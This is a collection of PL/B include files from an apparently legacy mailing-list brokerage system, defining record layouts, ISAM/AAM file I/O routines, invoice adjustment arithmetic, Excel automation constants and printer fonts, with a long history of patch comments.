.PROJECTION FILE END
.Start Patch 01/25/2005 - Replaced logic
.statFLD dim 29 ninmlr+source 1-4,117-141
statFLD dim 31 ninmlr+source 1-6,119-143
.End Patch 01/25/2005 - Replaced logic
statfld2 dim 6 nin LR 254-259
.Start Patch 02/20/2002
.Start Patch 01/25/2005 - Replaced logic
.statfld4 dim 7 statmlr (AAMKEY)
statfld4 dim 9 statmlr (AAMKEY)
.End Patch 01/25/2005 - Replaced logic
statfld5 dim 28 statpckcde (AAMKEY)
.End Patch 02/20/2002
STAT2FLD DIM 9 NIN LR + STATNUM
STAT2FLD2 DIM 9 NIN LR (AAMKEY)
STAT2FLD3 DIM 4 STATLOL (AAMKEY)
.Start Patch 02/20/2002
.Start Patch 01/25/2005 - Replaced logic
.stat2fld4 dim 7 NINMLR (AAMKEY) .NOT YET IMPLEMENTED
stat2fld4 dim 9 NINMLR (AAMKEY) .NOT YET IMPLEMENTED
.End Patch 01/25/2005 - Replaced logic
.End Patch 02/20/2002
statFLAG FORM 1
statFLAg2 FORM 1
stat2flag FORM 1
statpath form 1
StatLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.
....................................................................
. statvars: NINSTATS record layout (FIXED=501). Offsets below were
. checked against the DIM/FORM sizes and sum to exactly 501 bytes.
. FORM n.m fields occupy n+m+1 bytes (digits plus decimal point),
. consistent with the annotated ranges (e.g. FORM 4.2 = 7 bytes).
....................................................................
statvars list
.Start Patch 01/25/2005 - Replaced logic
.statmlr dim 4 1-4 NINCAL's mlr number for client
statmlr dim 6 1-6 NINCAL's mlr number for client
.End Patch 01/25/2005 - Replaced logic
statcampn dim 30 7-36 Campaign description
statmdate dim 8 37-44 mm,dd,cc,yy maildate
statwkso form 6 45-50 weeks out
statpdate dim 8 51-58 mail processed thru
statpanel dim 60 59-118 package description
statsrce dim 25 119-143 mlr source code
statldes dim 30 144-173 Mlr's list desc
statsel dim 30 174-203 list select
Statlist dim 6 204-209 ninca's list number
stattype dim 1 210-210 list type Continuation or Test, or Rent, Exchange, Split
statmqty form 8 211-218 quantity mailed
statresp form 7 219-225 number of responses
statrev form 9 226-234 gross revenue
statlcpm form 4.2 235-241 list cost per m
statImcst form 6.2 242-250 In mail cost per M = all costs.
.Start Patch 01/25/2005
.Added padding for future LR increase
statlr2 dim 3 251-253
.End Patch 01/25/2005
statlr dim 6 254-259 nin List Rental number
.Following field currently only used by TNC. Field was added in 1999 and is the TNC List Code. They currently
.only use part of the designated space - 4 bytes ASH 27NOV2001
statkycd dim 25 260-284 Mailers key code
Statpack form 5.2 285-292 total package cost
Statpckm form 5.2 293-300 total package cost per thous
statLVal FORM 4.2 301-307 Lifetime Value
statpckcde DIM 25 308-332 .changged 19June2001 to facilitate tracking TNC packages.
statpcknum dim 6 333-338 .Our Package Number
statLOL dim 1 339-339 .0=LR Record, 1=LOL Record
statgift form 4.2 340-346 .Average Gift
statresp2 form 3.2 347-352 .Response Rate
statnetreq form 3.2 353-358 .Net Requested
statnetrec form 3.2 359-364 .Net Received
statexbase form 6.2 365-373 .Exchange Base
statrbase form 6.2 374-382 .Rent Base
statrun form 6.2 383-391 .Running Charge
statselfee form 6.2 392-400 .Select Fee
statship form 6.2 401-409 .Ship/Tape
statpckprem form 6.2 410-418 .Package Premium Price
statrecqty form 9 419-427 .Recommended Qty
statavgnet form 3.2 428-433 .Net Qty
statnum dim 3 434-436
.START PATCH 03/22/2002
statcode dim 1 437-437 .Busy byte
.END PATCH 03/22/2002
.START PATCH 03/22/2002
statseluni form 9 438-446 .Select Universe
.END PATCH 03/22/2002
statfiller dim 55 447-501 .Filler for future fields
listend
.Following Variables used for Calculation of derived fields - NOT INCLUDED IN STATVARS!!!!!!
CALCSTATEXTOT FORM 6.2
CALCSTATRTOT FORM 6.2
CALCSTATNETREQ FORM 3.2
CALCSTATCOSTMEM FORM 6.2
.
CALCSTATNETP FORM 9.4
CALCSTATNETNAME FORM 9.4
CALCSTATTOTCOST FORM 9.4
CALCSTATLSTCOST FORM 9.4
CALCSTATPROCOST FORM 9.4
.END OF INCLUDE
.
..............................................................................
<file_sep>/include/GTBLDD.INC
..............................................................................
.
. GTBLDD INCLUSION
. TABLE FILE DEFINITION
.
. FILE NAME : TABLEFLE
. REC LENGTH: 79 FIXED
. INDEX KEY : 1-8 (TABLE CODE, TABLE DESIGNATION)
.
..............................................................................
.
.File handle and work fields for the generic code/description table
.(TABLEFLE, 79-byte fixed records, 8-byte key per the header above).
GTBLFILE IFILE KEYLEN=8
GTBLNAME INIT "TABLEFLE"
GTBLFLD DIM 8
GTBLFLAG FORM 1
.
.Record layout: 8-byte table code key followed by 71 bytes of text.
TBLCODE DIM 8 001-008 TABLE CODE - key
TBLTEXT DIM 71 009-079 TEXT
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/NCSHDD.INC
.............................................................................
. NCSHDD INCLUSION
. CASH FILE DESCRIPTION.
.
. FILE NAMES: DAT25Nx & DAT25Px patch 1.5
. REC LENGTH: 132
. INDEX : (1) 9-14 LR #
. AIM KEY : (1) 1-2 DUPE ID
. (2) 25-37 AMOUNT.
. (3) 40-42 CONTROL #.
. (4) 43-54 CHECK #
. (5) 110-117 CONTROL DATE
.Patch 1.6 DLH 09/12/2007 PLI add External code I - INter company transaction
.Patch 1.5 DLH 06/12/2007 PLI
.patch 1.4 ASH 01/10/2005 Increased Mailer/Broker/Check fields.
.patch 1.3 ASH Increased ISAM for Control, so added Control date. Added filler.
.patch 1.2 Added FileList, Added Check as AamKey
.patch 1.1 aug99 DLH get rid of EBCDIC
..............................................................................
NCSHFILE FILE
.START PATCH 1.2 REPLACED LOGIC
. IFNZ PC
.NCSHFIL2 AFILE
. XIF
. IFZ PC
..NCSHFIL2 AFILE 15,2,,FIXED=71,uncomp
..NCSHFIL2 AFILE FIXED=71,uncomp
..begin patch 1.1
..NCSHFIL2 AFILE FIXED=93,uncomp .-23-29,32-35
.NCSHFIL2 AFILE FIXED=99,uncomp .-23-35,38-40,41-46
. XIF
..NcshFiL3 IFILE KEYLEN=6,FIXED=71,DUP,uncomp
..NcshFiL3 IFILE KEYLEN=6,FIXED=93,DUP,uncomp
.NcshFiL3 IFILE KEYLEN=6,FIXED=99,DUP,uncomp .-7-12
..end patch 1.1
NCSHLIST Filelist
NCSHFIL2 AFILE NAME="DAT25N.AAM"
NcshFiL3 IFILE NAME="DAT25N.ISI"
Filelistend
.END PATCH 1.2 REPLACED LOGIC
NCSHNAME INIT "DAT25N "
NCSHFLD DIM 16
NCSHFLD2 DIM 6
NCSHFLD3 DIM 6
.START ADDED FOR NEW GUI PROGRAM
.START PATCH 1.4 REPLACED LOGIC
.NCSHFLD4 DIM 9
NCSHFLD4 DIM 15
.END PATCH 1.4 REPLACED LOGIC
NCSHFLD1 DIM 5
.END ADDED FOR NEW GUI PROGRAM
.START PATCH 1.3 ADDED LOGIC
NCSHFLD5 DIM 11
.END PATCH 1.3 ADDED LOGIC
NCSHFLAG FORM 1
NCSHFLG2 FORM 2
NCSHFLG3 FORM 2
NCSHPATH FORM 1 1=SEQ,2=AIM
NCSHLOCK FORM 1 0 or 1=File Locks, 2=Record Locks, 3=No Locks
...............................................................................
cashvars list
CID DIM 2 POSITION 1-2 RECORD ID.
.START PATCH 1.4 REPLACED LOGIC
.CMLR DIM 4 POSITION 3-6 MAILER NUMBER.
CMLR DIM 6 POSITION 3-8 MAILER NUMBER.
.END PATCH 1.4 REPLACED LOGIC
.DURING CONVERSION ON 1/25/2005 I forgot to add 3 blank spaces here for future increase in LR number. ASH
CLR DIM 6 POSITION 9-14 LIST RENTAL NUMBER.
CFILL1 DIM 2 POSITION 15-16 NOT USED.
CCE DIM 2 POSITION 17-18 CENTURY RECORD ENTERED.
CYR DIM 2 POSITION 19-20 YEAR RECORD ENTERED.
CMO DIM 2 POSITION 21-22 MONTH RECORD ENTERED.
CDY DIM 2 POSITION 23-24 DAY RECORD ENTERED.
.CMO DIM 2 POSITION 15-16 MONTH RECORD ENTERED.
.CDY DIM 2 POSITION 17-18 DAY RECORD ENTERED.
.CYR DIM 2 POSITION 19-20 YEAR RECORD ENTERED.
..ASH Added following field 06Nov98 for Y2K compliance, increased position for other fields
.CCE DIM 2 POSITION 21-22 CENTURY RECORD ENTERED.
.begin patch 1.1
.CAMOUNT DIM 7 POSITION 23-29 AMOUNT OF CASH IN. minus overpunch
CAMOUNT FORM 10.2 POSITION 25-37 AMOUNT OF CASH IN.
.end patch 1.1
CEXTCD DIM 1 POSITION 38-38 EXTERNAL CODE.
. M = Manual - discouraged.
. P = Owner was previously paid do not cut check or overwrite manual check info.
. O = Apply funds to A/R from Money on Account.
. Q = TYPE P + TYPE O.
. A = Do not close invoice. Mlr still owes, but cut check to LO. & flag/adjust A/P
. not yet implemented.
. D = Apply Money to MOA requires MLR/BRK/CHK Number LR optional
. I = Inter Company Transaction Do not cut check - just used to record income
CFILL2 DIM 1 POSITION 39-39 NOT USED.
CNUM DIM 3 POSITION 40-42 CONTROL NUMBER.
.START PATCH 1.4 REPLACED LOGIC
.NCSHCHK DIM 6 43-48 Mailers check number.
NCSHCHK DIM 12 43-54 Mailers check number.
.END PATCH 1.4 REPLACED LOGIC
nckdtec dim 2 55-56 Mailer check date century.
nckdtey dim 2 57-58 Mailer check date year.
nckdtem dim 2 59-60 Mailer check date month.
nckdted dim 2 61-62 Mailer check date day.
.nckdtey dim 2 51-52 Mailer check date year.
.nckdtec dim 2 53-54 Mailer check date century.
.ASH Increased following field 06Nov98 to reflect new size of field in NINMLR/NINBRK
.npayor dim 25 49-73 mailer/broker who paid us
.START PATCH 1.2 REPLACED LOGIC
.npayor dim 45 55-99 mailer/broker who paid us
npayor dim 41 63-103 mailer/broker who paid us
.START PATCH 1.4 REPLACED LOGIC
.NCSHBRK DIM 4 96-99 Broker Number
NCSHBRK DIM 6 104-109 Broker Number
.END PATCH 1.4 REPLACED LOGIC
.END PATCH 1.2 REPLACED LOGIC
.START PATCH 1.3 ADDED LOGIC
CNUMDATE DIM 8 110-117 Control Date
.begin patch 1.5
CCOMPID Dim 1 118-118 COmpany ID "N" or " " = NIN "P" = PLI
.end patch 1.5
CFiller dim 14 119-132 Filler
.CFiller dim 15 118-132 Filler
.end patch 1.5
.END PATCH 1.3 ADDED LOGIC
listend
..
LISTOFF
.PROGRAM
.
.NCHK0001
.NCHK0002
.NCHK0003
.
LISTON
<file_sep>/include/nrefdd.inc
* NREFDD.INC
* *****************************************************************************
* NAMES IN THE NEWS MASTER DATACARD REFERENCE FILE.
* *****************************************************************************
.
. FILE: NINREF
. LENGTH: 100
. TYPE: ISAM/AAM
. KEY: 1-1 NREFCODE
. 2-4 NREFNUM
. AAMKEY: 1-1 NREFCODE
.
.patch 2016 May 11 filepi,record lock, no lock options
.patch 3 2014 August 8 add description to the aam key
.Patch MAY 2011 - Add SRDS and expand
.Patch August 2006 - Add Min codes
...............................................................................
NREFNAME INIT "NINREF"
NREFFLIST FILELIST
NREFFILE IFILE KEYLEN=4,FIXED=100,Name="NINREF.isi|NINS1:502"
NREFFLE3 IFILE KEYLEN=3,FIXED=100,Name="NINREFMin.isi|NINS1:502" .min key
NREFFLE2 AFILE FIXED=100,Name="NINREF.aam|NINS1:502"
NREFFLE4 IFILE KEYLEN=35,FIXED=100,Name="NINREFSRDS.isi|NINS1:502" .SRDS Key
.NREFFILE IFILE KEYLEN=4,FIXED=81,Name="NINREF.isi|NINS1:502"
.NREFFLE3 IFILE KEYLEN=3,FIXED=81,Name="NINREFMin.isi|NINS1:502" .min key
.NREFFLE2 AFILE FIXED=81,Name="NINREF.aam|NINS1:502"
.NREFFLE4 IFILE KEYLEN=28,FIXED=81,Name="NINREFSRDS.isi|NINS1:502" .SRDS Key
FILELISTEND
NREFFLAG FORM 1
NREFFLD DIM 4 .main Isam key
NREFFLD1 DIM 4 .aam key 1
NrefFld3 Dim 3 .Min
NrefFld4 Dim 35 .srds
.begin patch 3.0
NrefFld5 Dim 49 .aam key 2 description
.end patch 3.0
NREFPATH FOrm 1
NrefLock Form 1
.
....................................................................
. NREFVARS: NINREF record layout (FIXED=100). The 1-byte code type
. plus 3-byte number form the primary ISAM key (bytes 1-4); the MIN
. and SRDS codes are alternate keys (NREFFLE3 / NREFFLE4 above).
. Offsets below were checked against the DIM sizes and total 100.
....................................................................
NREFVARS LIST
NREFCODE DIM 1 1-1 REFERENCE CODE TYPE
.TYPE OF CODES
.1 "A" ADDRESSING CODE
.2 "C" CLEANED CODE
.3 "D" DELIVERY CODE
.4 "L" SELECTION CODE
.5 "M" MEDIA CODE
.6 "N" NET NAME CODE
.7 "P" SAMPLE CODE
.8 "R" ARRANGEMENT CODE
.9 "S" SOURCE CODE
.10 "T" CATEGORY CODE
NREFNUM DIM 3 2-4 REFERENCE #
NREFDESC DIM 46 5-50 DESCRIPTION aam key fld5
NrefMin Dim 3 51-53 MIN code key
NrefSRDS Dim 35 54-88 SRDS - KEY
NREFFILL DIM 12 89-100 FILLER
.NREFFILL DIM 28 54-81 FILLER
.NREFFILL DIM 31 52-81 FILLER
LISTEND
NREFSTR DIM 150
.Min code descriptions need to be added.
.first pass
.1 "B" Business
.2 "C" Consumer
.3 "A" AGE
.4 "D" Dollar select
.5 "E" Enhance select
.6 "F" FSA
.7 "G" Geographic ??
.8 "H"
.9 "L" Media
.10 "M"
.11 "P"
.12 "R"
.13 "T"
.14 "U" UNinverse
.15 "X" special pricing / commission ??
.16 "W" web related ??
<file_sep>/include/nrtndd.inc
. Last change: DLH 6/13/2002 11:01:20 AM
..............................................................................
.
. NRTNDD INCLUSION
. NIN RETURN-TO FILE DEFINITION
.
. FILE NAME : NINRTN
. REC LENGTH: 227 FIXED. INDEX KEY : 1-4 (4 POSITION RTN#)
. AIM KEY : 50-94
.
. RElease 1.4 05Aug11 DLH added room for company & contact numbers preping for merge into company file
. RElease 1.3 24Apr07 DLH added file manager
. RElease 1.2 12April2007 DLH inactive byte
. RElease 1.1 19AUG98 ASH Y2K CONVERSION
..............................................................................
.
.file definitions for the NIN return-to file (NINRTN, 236-byte fixed records)
NRTNFILE IFILE KEYLEN=4,FIXED=236,UNCOMP,Name="NINRTN.isi|NINS1:502"
.NRTNFILE IFILE KEYLEN=4,FIXED=227,UNCOMP,Name="NINRTN.isi|NINS1:502"
NRTNNAME INIT "NINRTN|NINS1:502 "
NRTNFLE2 AFILE
NRTNFLE3 FILE FIXED=236
NRTNFLD DIM 7
NRTNFLD2 DIM 48
NRTNFLAG FORM 1
NRTNFLG2 FORM 1
NRTNFLG3 FORM 1
NRTNPATH FORM 1
NRTNLOCK FORM 1 0 or 1=File Locks, 2=Record Locks, 3=No Locks
.
...............................................................................
*
.rtnvars: NINRTN record layout; ISAM key 1-4, AIM key 50-94 (see header)
rtnvars list
RTNUM DIM 4 1-4 RETURN-TO NUMBER. **KEY**
.RTCNTCT DIM 25 5-29 RETURN-TO CONTACT NAME.
RTCNTCT DIM 45 5-49 RETURN-TO CONTACT NAME.
.RTCOMP DIM 25 30-54 RETURN-TO COMPANY NAME.
RTCOMP DIM 45 50-94 RETURN-TO COMPANY NAME. (AIM key)
RTADDR DIM 25 95-119 RETURN-TO ADDRESS.
RT2ADDR DIM 25 120-144 RETURN-TO ADDRESS2.
RTCITY DIM 15 145-159 RETURN-TO CITY.
RTSTATE DIM 2 160-161 RETURN-TO STATE.
RTZIP DIM 10 162-171 RETURN-TO ZIP.
RTCOUN DIM 15 172-186 RETURN-TO COUNTRY CODE
RTNAME DIM 10 187-196 PASSWORD NAME
.RTREVDAT DIM 6 117-122 REVISED DATE.
RTREVDAT DIM 8 197-204 REVISED DATE.
.RTBLANK DIM 3 205-207 NOT-USED.
RTBLANK DIM 2 205-206 NOT-USED.
RTActive Dim 1 207-207 ' ','Y'=active 'N' = do not use
RTTELE DIM 10 208-217 TELEPHONE
RTFAX DIM 10 218-227 FAX NUMBER.
RTCOMPN Dim 6 228-233 Company number
RTCNTN Dim 3 234-236 Contact Number
listend
.
<file_sep>/include/NJSTCLIO.inc
; Last change: JD 15 Sep 1999 3:41 pm
..............................................................................
.
. NJSTCLIO INCLUSION
. NIN DETAIL ADJUSTMENT APPLICATION ROUTINE
.
. APPLIES ADJUSTMENT AMOUNTS TO COMPUTED AMOUNTS FROM THE NINVCALC
. ROUTINE IN THE NINVCLIO INCLUSION.
.
.patch 1.1 PLI Sep 2007
..............................................................................
.
.NJSTCALC: fold the detail-adjustment amounts (jst* fields) into the
.running invoice totals produced by NINVCALC (NINVCLIO inclusion).
.The commented MOVE/CALL CVT pairs are the pre-conversion logic kept
.for history; the jst* fields are now numeric FORMs added directly.
NJSTCALC
. MOVE JSTAR TO CVTFLD
. CALL CVT
ADD jstar TO FAR
ADD jstar TO ARWOPP
.
. MOVE JSTAP1 TO CVTFLD
. CALL CVT
ADD jstap1 TO FAP1
ADD jstap1 TO AP
.
. MOVE JSTAP2 TO CVTFLD
. CALL CVT
ADD jstap2 TO FAP2
ADD jstap2 TO AP
.begin patch 1.1
ADD jstap3 TO FAP3
ADD jstap3 TO AP
Add JstXninc,Xninc
.end patch 1.1
.
. MOVE JSTLRINC TO CVTFLD
. CALL CVT
ADD jstlrinc to lRINC
ADD jstNINinc to NINC
.
. MOVE JSTSTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO STAX
. ADD NUM102 TO TAXES
.
. MOVE JSTCTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
.
. MOVE JSTPOST TO CVTFLD
. CALL CVT
. ADD NUM102 TO POST
.
add jststax to taxes
add jststax to stax
.
. MOVE JSTCTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
add jstctax to taxes
add jstctax to ctax
.
. MOVE JSTPOST TO CVTFLD
. CALL CVT
. ADD NUM102 TO POST
add jstpost to post
.
RETURN
.
.CVT: legacy numeric-conversion helper (minus-overpunch handling).
.All of its logic is commented out; the entry point is retained so any
.remaining CALL CVT references still resolve, and it simply returns.
CVT
. ENDSET CVTFLD CHECK LAST BYTE.
. RESET MPCHARS
. SCAN CVTFLD IN MPCHARS IS IT A MINUSOVRPNCH?
. GOTO CVTMP IF EQUAL YES.
. RESET CVTFLD NO.
. TYPE CVTFLD CHECK NUMERIC VALIDITY.
. GOTO CVTOK IF EQUAL ITS OK.
.FORMERR DISPLAY *P01:24,*EL,*B,"Format error in NJSTCALC. ",*W9
. MOVE B10 TO CVTFLD
. RETURN
.CVTMP REPLACE MPCHANGE IN CVTFLD CHANGE MP TO NUMBER.
. RESET CVTFLD
. TYPE CVTFLD VALID NUMERIC?
. GOTO FORMERR IF NOT EQUAL NO.
. MOVE CVTFLD TO NUM10 MOVE INTO NUMERIC.
. MULTIPLY "-1" BY NUM10 CHANGE TO MINUS.
. MOVE NUM10 TO CVTFLD MOVE BACK TO DIM.
.CVTOK MOVE CVTFLD TO NUM102
. MULTIPLY ".01" BY NUM102
RETURN
<file_sep>/include/XMGTIO.INC
..............................................................................
.
. xmgtIO INCLUSION
.
. FILE NAME : exchmgmt
..............................................................................
.
. ENTRY POINT : xmgtKEY
. REQUIRED : 'xmgtFLD', xmgtPATH
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
.xmgtKEY: open on first use, then exact ISAM key read into xmgtvars.
xmgtKEY
BRANCH xmgtFLAG TO xmgt1
CALL xmgtOPEN
xmgt1 FILEPI 1;xmgtFILE
READ xmgtFILE,xmgtFLD;xmgtvars
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtTST
. REQUIRED : xmgtFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
.xmgtTST: key-existence test; reads into scratch STR1 only.
xmgtTST
BRANCH xmgtFLAG TO xmgt2
CALL xmgtOPEN
xmgt2 FILEPI 1;xmgtFILE
READ xmgtFILE,xmgtFLD;STR1
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtKS
. REQUIRED :
. RETURNED :
. DESCRIPTION : KEY SEQUENTIAL LIST-
.
xmgtKS
BRANCH xmgtFLAG TO xmgt3
CALL xmgtOPEN
xmgt3 FILEPI 1;xmgtFILE
READKS xmgtFILE;xmgtvars
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtSEQ
. REQUIRED :
. RETURNED : LIST-
. DESCRIPTION : SEQUENTIAL LIST-
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
xmgtSEQ
BRANCH xmgtFLAG TO xmgt4
CALL xmgtOPEN
xmgt4 FILEPI 1;xmgtFILE
READ xmgtFILE,SEQ;xmgtVARS
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtWRT
. REQUIRED : 'xmgtFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
xmgtWRT BRANCH xmgtFLAG TO xmgt5
CALL xmgtOPEN
xmgt5 FILEPI 1;xmgtFILE
WRITE xmgtFILE,xmgtFLD;xmgtVARS
RETURN
..............................................................................
.
. ENTRY POINT : xmgtUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST-
.
xmgtUPD BRANCH xmgtFLAG TO xmgt6
CALL xmgtOPEN
xmgt6 FILEPI 1;xmgtFILE
UPDATE xmgtFILE;xmgtVARS
RETURN
..............................................................................
.
. ENTRY POINT : xmgtDEL
. REQUIRED : 'xmgtFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
xmgtDEL BRANCH xmgtFLAG TO xmgt7
CALL xmgtOPEN
xmgt7 FILEPI 1;xmgtFILE
DELETE xmgtFILE,xmgtFLD
RETURN
...............................................................................
.
. ENTRY POINT : xmgtOPEN
. REQUIRED : 'xmgtPATH'
. RETURNED : 'xmgtFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
xmgtOPEN
TRAP xmgtGONE GIVING ERROR IF IO
OPEN xmgtFILE,xmgtNAME
TRAPCLR IO
MOVE C1 TO xmgtFLAG
RETURN
.
.
.on open failure: report the missing file via the shared FILEGONE handler
.(per the banner above, FILEGONE displays the error and aborts).
xmgtGONE MOVE xmgtNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/excel.inc
.THIS IS A DEVELOPMENT FILE. NOT YET READY FOR PRIME TIME.
.Variant Types
.OLE variant-type constants used when talking to Excel via COM automation
VT_EMPTY EQU 0 .nothing
VT_NULL EQU 1 .SQL style null
VT_I2 EQU 2 .2 byte signed integer
VT_I4 EQU 3 .4 byte signed integer
VT_R4 EQU 4 .4 byte real - Float
VT_R8 EQU 5 .8 byte real - Double
VT_CY EQU 6 .Currency
VT_DATE EQU 7 .Date
VT_BSTR EQU 8 .OLE automation string
VT_DISPATCH EQU 9 .Idispatch FAR *
VT_ERROR EQU 10 .SCODE
VT_BOOL EQU 11 .Boolean - True = -1, False = 0
VT_VARIANT EQU 12 .VARIANT FAR *
VT_UNKNOWN EQU 13 .Unknown type
VT_UI1 EQU 17 .Unsigned character
.automation object handles for the Excel object model
books automation
book automation
sheets automation
sheet automation
ex automation class="Excel.Application"
.Variant objects used to talk to outside applications
xlRowHeight variant
Zoom80 variant
.Formatting vars
.Generic Variant objects useful in Excel
.Booleans
.PL/B does not have a Boolean datatype, so we have to create our own.
OTRUE variant
OFALSE variant
.Formatting vars needed
.This constant was found in the Object Browser in Excel under the Help topic for the
.HorizontalAlignment property of the Range object.
AlignCenter integer 4,"0xffffeff4"
AlignLeft integer 4,"0xffffefdd"
AlignRight integer 4,"0xffffefc8"
AllMargin variant
MedThick integer 4,"0xFFFFEFD6"
SheetsDefault integer 4,"0x00000000"
xlAlignCenter integer 4,"0xffffeff4"
xlColWidth variant
xlLandscape integer 4,"0x2" .2
xlMaximized integer 4,"0xFFFFEFD7"
xlMinimized integer 4,"0xFFFFEFD4"
xlPaperLegal integer 4,"0x5"
xlUnderlineStyleSingle integer 4,"0x2"
SReturn init 0x0a .soft return/line feed
LOText dim 100
range dim 20
range2 dim 20
.............................................................................................................
.Sample
. Book.PrintOut using *From=1, *To=1, *Copies=1, *Preview=0:
. *PrintToFile=0, *Collate=0
.............................................................................................................
//Boolean values, in reality, are expressed as follows:
//False = '0', True = anything other than '0', usually '-1'
create OTRUE,VarType=VT_BOOL,VarValue=1
create OFALSE,VarType=VT_BOOL,VarValue=0
<file_sep>/include/prtpagedd.INC
.fonts, logo pictures and print-file objects for laser page printing
.(the column/column1/column2 variables are declared in COns.inc)
PRTPG24B Font
PRTPG24I Font
PRTPG12 Font
PRTPG12I Font
PRTPG12B Font
PRTPG10 Font
PRTPG10B Font
PRTPG10I Font
PRTPG9 Font
PRTPG9B Font
PRTPG9I Font
PRTPG6 Font
PRTPG85 Font
PRTPG7 Font
PRTPG9BI Font
PRTPGfont7 font
PRTPGfont8 font
PRTPGfont9 font
NINLogo PICT
NINLogoColorbox Pict
NINLogobox Pict
CopyRightS Init "©"
.
Laser PFILE
create PRTpg24B,"Times New Roman",size=24,Bold
create PRTpg24I,"Times New Roman",size=24,Italic
create PRTpg12,"Times New Roman",size=12
create PRTpg12B,"Times New Roman",size=12,Bold
create PRTpg12I,"Times New Roman",size=12,Italic
create PRTpg10,"Times New Roman",size=10
create PRTpg10B,"Times New Roman",size=10,Bold
create PRTpg10I,"Times New Roman",size=10,Italic
create PRTpg9,"Times New Roman",size=9
create PRTpg9B,"Times New Roman",size=9,Bold
create PRTpg9I,"Times New Roman",size=9,Italic
create PRTpg6,"Times New Roman",size=6
create PRTpg9BI,"Times New Roman",size=9,Bold,Italic
create PRTpg7,"Times New Roman",size=7
create PRTpg85,"Times New Roman",Size="8.5"
create PRTPGfont7,"Helvetica",size=12
; create PRTPGfont7,"Helvetica",size=14,bold
create PRTPGfont8,"Helvetica",size=14,italic
create PRTPGfont9,"Arial",size=12
move "750",column ;requires COns.inc
move "1750",column1 ;requires COns.inc
move "3000",column2 ;requires COns.inc
CREATE NINLogo=3:13:30:50:
"\\nins1\e\netutils\NIN logo black outline.jpg"
CREATE NINLogoColorbox=3:10:30:40:
"\\nins1\e\netutils\logo color box only.jpg"
CREATE NINLogobox=3:10:30:40:
"\\nins1\e\netutils\logo block Outline box.jpg"
<file_sep>/include/NInvBrkGIO.INC
..............................................................................
.
. NINVBRKGIO INCLUSION
. NIN Broker Guar letter log file
;. ............................................................................
;.
;. FILE: NINVBRKGuar
;. LENGTH: 33
;. COMPRESS: NONE
;. TYPE: ISAM
;. isi KEY: 01-06 INvoice # DUplicates allowed
;*******************************************************************************
;*patch 1.0 09Feb2004 DLH Broker Guar letter 1st release
;*******************************************************************************
..............................................................................
. ENTRY POINT : NINVBRKGKey
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Isam READ
.
.NINVBRKGKey: open on first use, then exact ISAM key read of the broker
.guarantee-letter log record into its field list.
NINVBRKGKey BRANCH NINVBRKGFLAG TO NINVBRKG1
CALL NINVBRKGOPEN
NINVBRKG1 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,NinvBRKGfld;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGTST
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Test Isam READ
.
NINVBRKGTST BRANCH NINVBRKGFLAG TO NINvBrkG2
CALL NINVBRKGOPEN
NINVBRKG2 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,NinvBRKGFLD;;
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGKS
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Key SEQUENTIAL READ
.
NINVBRKGKS BRANCH NINVBRKGFLAG TO NinvBrkg3
CALL NINVBRKGOPEN
NINVBRKG3 FILEPI 1;NINVBRKGFILE
READKS NINVBRKGFILE;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGSEQ
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : SEQUENTIAL READ
.
NINVBRKGSEQ BRANCH NINVBRKGFLAG TO NinvBrkg4
CALL NINVBRKGOPEN
NINVBRKG4 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,SEQ;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGWrt
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Key WRite
.
NINVBRKGWRT BRANCH NINVBRKGFLAG TO NinvBrkg5
CALL NINVBRKGOPEN
NINVBRKG5 FILEPI 1;NINVBRKGFILE
WRite NINVBRKGFILE,NINVBRKGFLD;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGUpd
. REQUIRED : Previous valid read
. RETURNED : RECORD
. DESCRIPTION : Isam Update
.
NINVBRKGUPD BRANCH NINVBRKGFLAG TO NinvBrkg6
CALL NINVBRKGOPEN
NINVBRKG6 FILEPI 1;NINVBRKGFILE
Update NINVBRKGFILE;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
